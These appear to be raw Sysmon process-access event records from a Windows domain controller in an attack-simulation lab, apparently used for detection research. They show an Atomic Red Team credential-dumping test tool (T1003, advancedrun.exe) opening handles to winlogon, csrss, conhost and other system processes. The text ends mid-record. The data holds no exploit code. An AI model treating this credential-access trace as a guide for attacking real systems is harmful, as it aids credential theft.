10341000x80000000000000003952150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003952144Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952143Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952142Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952140Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952138Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952136Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952135Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952134Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952132Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952131Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952130Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll